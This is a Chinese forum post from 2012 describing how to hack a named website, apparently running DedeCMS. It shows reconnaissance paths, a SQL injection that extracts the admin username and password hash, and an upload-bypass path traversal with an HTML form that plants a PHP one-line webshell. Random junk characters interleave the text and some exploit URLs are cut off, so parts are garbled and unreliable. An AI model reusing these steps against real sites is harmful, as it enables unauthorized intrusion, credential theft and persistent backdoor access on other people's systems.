①注入漏洞。% c+ ], f" p( Z, |- l6 F. r* k
这站 http://www.political-security.com/
" S% d, P9 `1 j2 V- S, \+ T7 j首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
$ g" d3 g$ u% k2 R7 c+ i: @' |www.political-security.com/data/mysql_error_trace.inc 爆后台
8 @) m/ J& g& H; Z. x/ e9 H$ R然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
! E7 I8 T6 Y" m# d+ f2 g9 }# H0 S然后写上语句 1 `4 `+ F+ k7 s% v- ?2 a! i" g
查看管理员帐号
8 u, S* c, _/ \, |http://www.political-security.co ... &membergroup=@`
/ H0 v. \$ I) K, {% L
, {4 m: \ N/ p5 U, I7 l- Gadmin % j0 ?1 ^0 Z! }/ Y8 V
8 h9 t0 k2 T1 C! ?查看管理员密码
0 \6 y C- e z" R! p http://www.political-security.co ... &membergroup=@`
0 p1 K8 b8 r6 z+ O; W5 |6 K( C3 j+ t) Z7 E0 b! q
8d29b1ef9f8c5a5af429
4 s; O1 S g% n1 [; R) M- L2 p9 i$ ?! K w4 P
查看管理员密码0 b0 [/ X0 c4 ` D
7 E5 T5 U5 s$ D' H' l6 h
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
, u& F7 I6 A6 q3 w8 ^4 l
$ A7 Y2 y3 H& m$ t, D& C$ F) D8d2
; S. a2 e4 Q5 J4 {4 `; e/ q9b1ef9f8c5a5af429 k; K* w$ T y% Q+ s! e
9
' S* s8 A) u" N2 c+ ~. l7 ]+ U$ m g+ A7 f9 U. ^& P
cmd5没解出来 只好测试第二个方法0 j# w8 ^" I8 p' |
Z6 X% b) ?" W x; a" ~3 A
5 o+ J* b# R4 D②上传漏洞: ~& s/ a. D2 s# n
# N3 {2 a' }0 T# j只要登陆会员中心,然后访问页面链接# p2 C1 T+ S9 P
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
8 d; [+ M. B% b" p. ^* w
3 j5 N3 @% E; [& o& N$ w+ ?2 L如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post” o' \' h( W1 ^; J( `, p
( @2 i1 F7 p; j5 N& T3 }
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
9 d* | d5 B4 h$ z+ Y0 h: T) U2 E, t' T" r- g Y5 O
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
( e4 X- O0 n! D" @7 [或者
4 ^, e) N, |# E$ i3 L9 V9 O即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对